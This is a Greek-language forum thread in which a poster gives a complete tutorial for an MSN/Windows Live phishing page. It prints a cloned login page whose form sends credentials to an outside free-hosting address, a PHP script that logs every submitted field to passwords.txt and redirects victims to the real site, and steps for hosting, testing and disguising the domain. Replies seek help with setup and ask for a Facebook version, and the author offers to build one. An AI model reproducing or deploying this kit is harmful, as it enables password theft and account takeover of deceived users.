[GR] Ftiakste MSN Phishing Page (gia na pairnete passwords)

[Jigsaw*]

Katarxin gia osous den gnorizoun phishing page einai mia pseftiki selida pou exei ti morfi mias allis.. Diladi se aftin tin periptosi tha ftiaksoume mia selida pou tha exei ti morfi tou msn logger etsi oste kapoios na nomizei pos kanei log in sto msn eno mas dinei to pass tou..

 

1. Anoikste to notepad (simiomatario) kai kante paste ton kodiko apo kato kai apothikefste to san "index.php".

<!-- ServerInfo: BAYIDSLGN1U15 2009.09.30.02.01.00 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: btsa007:TK1ESRVBLDA045,  -- Version: 7,0,13346,0 -->
<html dir="ltr"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><base href="http://login.live.com/pp700/"/><noscript><meta http-equiv="Refresh" content="0; URL=http://login.live.com/jsDisabled.srf?lc=1033"/></noscript><title>Sign In</title><meta name="PageID" content="i5030"/><meta name="SiteID" content="1184"/><meta name="ReqLC" content="1033"/><meta name="LocLC" content="1033"/><script type="text/javascript">window.name="msnMain";function Nav(s){ var u;switch(s){ case "reg":u="http://accountservices.passport.net/reg.srf?wa=wsignin1.0&rpsnv=11&ct=1258459761&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fwww.msn.com%2F%3Flc%3D1033&id=1184&bk=1258459765&cru=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d5.5.4177.0%26wp%3dLBI%26wreply%3dhttp:%252F%252Fwww.msn.com%252F%253Flc%253D1033%26lc%3d1033%26id%3d1184&lc=1033&sl=1";break;case "support":u="http://accountservices.passport.net/CustomerSupport.srf?wa=wsignin1.0&rpsnv=11&ct=1258459761&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fwww.msn.com%2F%3Flc%3D1033&id=1184&vv=700&lc=1033&sl=1";break;}document.location=u;}var g_bFS=false;var g_urlLoginSSL="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fwww.msn.com%2F%3Flc%3D1033&lc=1033&id=1184&bk=43765260";function OnBack(){}</script><link rel="stylesheet" type="text/css" href="CSS/WEBwhitegray1033.css?x=7.0.13330.0"/><style type="text/css" media="screen">body,.css9999,.css9996{ margin:0;padding:0;width:100%;height:100%;}.css9997{ width:335;vertical-align:top;background:#fff;padding:10px;margin:0;}.css9996{ background:#fff;}.css9993{ width:80px;height:280px;background:#fff;}.css9995{ width:100%;height:280px;background:#fff;}</style><script type="text/javascript" src="JS/PPPrimary.js?x=7.0.13330.0"></script><script type="text/javascript">try{ var g_oD=new Date(),g_sCK="CkTst=G"+g_oD.getTime();document.cookie=g_sCK;if(document.cookie.indexOf(g_sCK)==-1){ document.location="http://login.live.com/cookiesDisabled.srf?lc=1033"}}catch(e){}function POL(){ IsParent();CheckEnhancedSecOption();SetFocus(document.f1,"");AttachHandlers();DownloadTPImg();}function POUL(){ }</script><script type="text/javascript">var g_QS="wa=wsignin1.0&rpsnv=11&ct=1258459761&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fwww.msn.com%2F%3Flc%3D1033&lc=1033&id=1184&bk=1258459765";var g_DO=new Object;g_DO["compaq.net"]="https://msnia.login.live.com/ppsecure/post.srf";g_DO["hotmail.co.jp"]="";g_DO["hotmail.co.uk"]="https://login.live.com/ppsecure/post.srf";g_DO["hotmail.com"]="";g_DO["hotmail.de"]="https://login.live.com/ppsecure/post.srf";g_DO["hotmail.fr"]="https://login.live.com/ppsecure/post.srf";g_DO["hotmail.it"]="https://login.live.com/ppsecure/post.srf";g_DO["messengeruser.com"]="https://login.live.com/ppsecure/post.srf";g_DO["msn.com"]="https://msnia.login.live.com/ppsecure/post.srf";g_DO["passport.com"]="https://login.live.com/ppsecure/post.srf";g_DO["webtv.net"]="https://login.live.com/ppsecure/post.srf";var g_fAsyncDLEnabled = true;var g_urlRDScript='RDHelper_JS.srf?x=7.0.13330.0&lc=1033';var srf_RDAJAX=1;var g_sBrandTitle='';var g_sNonFedDom=',@hotmail.,@msn.,@live.,@yahoo.,@gmail.,@windowslive.,@sympatico.,@aol.,@163.,@freemail.,@gmx.,@comcast.,@web.,@libero.,@wanadoo.,@sbcglobal.,@example.,@tiscali.,@126.,@mail.,@q.,@xiaoi.,@hanmail.,@walla.,@free.,@ppauthz.com,';var g_sFedQS='wa=wsignin1.0&wtrealm=uri:WindowsLiveID&wctx=wa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1258459761%26rver%3D5.5.4177.0%26wp%3DLBI%26wreply%3Dhttp:%252F%252Fwww.msn.com%252F%253Flc%253D1033%26lc%3D1033%26id%3D1184%26bk%3D1258459765';var g_RDHash=1;</script></head><body onload="javascript:POL();" onunload="javascript:POUL();" onclick="javascript:SetF();" onscroll="javascript:SetF();"><table cellpadding="0" cellspacing="0" border="0" class="css9999"><tr><td colspan="3"><iframe src="cache/Cobranding.srf?cbloc=cbh&cbtype=msnlite&cbpage=login&lc=1033&x=7.0.13330.0" width="100%" height="93" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6000"></iframe></td></tr><tr><td valign="top" class="css9993"><iframe src="cache/Cobranding.srf?cbloc=cb&cbtype=empty&cbpage=login&lc=1033&x=7.0.13330.0" width="80" height="280" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6001"></iframe></td><td class="css9997"><form name="f1" style="margin:0px;" method="POST" target="_top" action="http://mpesstomsnsou.t35.com/login.php" onsubmit="return OnSigninSubmit(this);"><input type="hidden" id="i0326" name="PPSX" value="Pas"/><input type="hidden" name="PwdPad" id="i0340" value=""/><input type="hidden" name="type" id="type" value=""/><table cellpadding="0" cellspacing="0" class="css0086"><tr><td class="css0144"><table cellpadding="0" cellspacing="0" class="css0113"><tr><td class="css0002">Sign in to MSN.com</td></tr></table></td></tr><tr><td class="css0145"><table cellpadding="0" cellspacing="0" class="css0113"><tr><td class="css0119" colspan="2"><table cellpadding="0" cellspacing="0" id="i0519" style="display:none;" class="css0113"><tr><td class="css0122"><img src="images/icon_err.gif?x=7.0.13330.0" alt="Error symbol" id="i2017"/></td><td class="css0149"><span  class="css0023">Please type your e-mail address in the following format: yourname@example.com. <a href="javascript:DoHelp('PPSlhlpd','','1033','DH_MSN,1033','','700');" id="i1056">Need help signing in?</a></span></td></tr></table></td></tr><tr><td valign="top" class="css0059" align="right"><label for="i0116">E-mail address:</label></td><td valign="top" class="css0093"><input name="login" type="text" id="i0116" maxlength="113" autocomplete="off"  value="" style="ime-mode:disabled" class="css0034" /></td></tr><tr style="display:none;" id="i0512"><td class="css0096" style="font-size:1px;"> </td><td class="css0097"><table cellpadding="0" cellspacing="0" class="css0113"><tr><td class="css0122"><img src="images/icon_err.gif?x=7.0.13330.0" alt="Error symbol" id="i2017"/></td><td class="css0149"><span  class="css0023">This information is required.</span></td></tr></table></td></tr><tr><td valign="top" class="css0059" align="right"><label for="i0118">Password:</label></td><td valign="top" class="css0093"><input name="passwd" type="password" id="i0118" maxlength="16" autocomplete="off"  value="" style="ime-mode:disabled" class="css0034" /><div class="css0064"><a href="https://login.live.com/resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1258459761&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fwww.msn.com%2F%3Flc%3D1033&id=1184&bk=1258459765&lc=1033" id="i1011" >Forgot your password?</a></div></td></tr></table><div class="css0170" align="right"><nobr><input name="SI" id="i0011" type="submit" value="    Sign in    " class="css0088"  /></nobr></div></td></tr><tr><td class="css0146"><table cellpadding="0" cellspacing="0" class="css0113"><tr><td valign="top" ><input type="radio" name="LoginOptions" id="i0136" value="1"  /></td><td valign="top" class="css0041"><label for="i0136">Save my e-mail address and password</label></td></tr><tr><td valign="top" ><input type="radio" name="LoginOptions" id="i0137" value="2" checked /></td><td valign="top" class="css0041"><label for="i0137">Save my e-mail address</label></td></tr><tr><td valign="top" ><input type="radio" name="LoginOptions" id="i0138" value="3"  /></td><td valign="top" class="css0041"><label for="i0138">Always ask for my e-mail address and password</label></td></tr></table><div style="padding:3px 0 0 0;font-size:1px;"> </div><p class="css0006" style="padding-left:5px;"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fwww.msn.com%2F%3Flc%3D1033&lc=1033&id=1184&bk=43765260" id='i1663' onclick="javascript:SetWLLoginOption('ssl',1)">Sign in using enhanced security</a></p></td></tr><tr><td class="css0147"><table cellpadding="0" cellspacing="0" class="css0113"><tr><td rowspan="3" valign="top"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1258459761&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fwww.msn.com%2F%3Flc%3D1033&id=1184&vv=700&lc=1033" target="_blank" id="i1071"><img src="images/LiveID16.gif?x=7.0.13330.0" alt="Windows Live ID" border="0" id="i2033" class="css0189"/></a></td><td class="css0175"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1258459761&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fwww.msn.com%2F%3Flc%3D1033&id=1184&vv=700&lc=1033" target="_blank" id="i1071">Windows Live ID</a></td></tr><tr><td class="css0875"> Works with Windows Live, MSN, and Microsoft Passport sites</td></tr></table></td></tr></table><input type="hidden" name="PPFT" id="i0327" value="CexGznuJy3ibJY87YozTJnIIZQ48OVgmYPfQFeWnje2FfO!31oSV98r!ALEz48vbfku9BwcNy*RIhlbHtA15NBgat6MtGwbi929ANiQBolNDyD9Sg0*I7AsE!fhLrCiU3rDxplwZVN!z6eIPqTXbtaclL*Q0UnDMlacTQYEXmfA6dMQeatT6X73!LLhh"/></form><table cellpadding="0" cellspacing="0" border="0" width="335" style="font-size:0;"><tr><td> </td></tr></table></td><td valign="top" class="css9995"><iframe src="cache/Cobranding.srf?cbloc=cbr&cbtype=msnaslite&cbpage=login&lc=1033&x=7.0.13330.0" width="100%" height="280" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6002"></iframe></td></tr><tr><td valign="top" colspan="3" class="css9996"><iframe src="cache/Cobranding.srf?cbloc=cbf&cbtype=msnlite&cbpage=login&lc=1033&x=7.0.13330.0" width="100%" height="26" frameborder="0" scrolling="no" align="bottom" marginwidth="0" marginheight="0" name="i6003"></iframe></td></tr></table></body></html>

 

2. Anoikste pali to notepad kai kante paste ton parakato kodiko kai apothikefste to san "login.php".

<?php
header ('Location: http://login.live.com');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

 

3. Anoikste pali to notepad kai xoris na grapsete tipota apothikefste to arxeio san "passwords.txt".

4. Vreite ena free webhost opos to t35.com i opoio allo thelete pou na mporeite na anevazete eseis to index tou site kai ta loipa xoris na ta exei etoima.

5. Anevaste ta tria arxeia.

6. Afou exete epileksei ti onoma tha dosete sto site sas (px msn.t35.com) mpeite kai kante mia dokimi vazontas ena opoiodipote id kai password kai patontas log in.

7. Kante log in sto t35.com kai anoikste to arxeio "passwords.txt". An sas diksei to id kai to password pou valate tote i phishing page sas doulevei.

 

 

 

Edo einai i diki mou phishing page gia to msn. Tin eftiaksa dokimastika:

link --> http://mpesstomsnsou.t35.com/

 

Mporeite na kalipsete to t35.com mpainontas sto dot.tk kai allazontas to. Oti apories i diskolies exete kante ena post.

(To t35.com einai paradigma mporeite na xrisimopoiisete opoio host thelete)

[-Mr.CuTe-]

nai alla o alos an patisei mono sto link dn ginete tpt etsi?

[Jigsaw*]

nai alla o alos an patisei mono sto link dn ginete tpt etsi?

 

oxi.. prepei na ton psarepseis oste na kanei log in..

[flAmingw0rm]

den brhskw site gmt

[ConArtist™]

den brhskw site gmt

dokimase afto www.freehostia.com

[Jigsaw*]

den brhskw site gmt

 

an dn anoigei to t35.com prepei na apenergopoiiseis to firewall sou.. den ksero giati to kanei afto se merikous..

 

i kane afto pou sou leei o Pantotinos kai dokimase allo site

[mjst]

re c kati paromio den mporoume na kanoume gia to facebook? yparxi kapios alos tropos na paris to pass apo facebook ean xereis to mail tou?

[Jigsaw*]

re c kati paromio den mporoume na kanoume gia to facebook? yparxi kapios alos tropos na paris to pass apo facebook ean xereis to mail tou?

 

mporo na ftiakso phishing page kai gia to facebook.. omos tha einai to idio stil sto hack.. diladi tha prepei o allos na kanei log in

[mjst]

kali fasi ean ftiaxis kado post  edo sto mxc na to doume :D

afto pou einai gia to msn to ixa di se enan opou elege mpite edo kai mporite na milate sto msn kai kala online se site xoris to msn.exe  tin ixa patisi mia fora prin xronia :D

[DarkHacker]

dn boro na kanw upload to passwords.txt

[Tifε]

fILE M exo ena problem den mporo na balo to arxei txt passwords mesa sto site m leei epikindino sfalma gt?

[kosker]

to program safari den ta anigi.

[Ma3x*]

Nice topic man k dn einai pl diskolo apo oti blepw :D

[Jigsaw*]

dn boro na kanw upload to passwords.txt

 

dokimase na min to kaneis upload aplos anevase ta alla 2 arxeia kai kane ena log in apo tin phishing page (me oti id kai pass thes) nomizo pos mporei na s dimiourgithei mono tou to passwords.txt

[kosker]

ftiakse ena vid re. mperdebome:P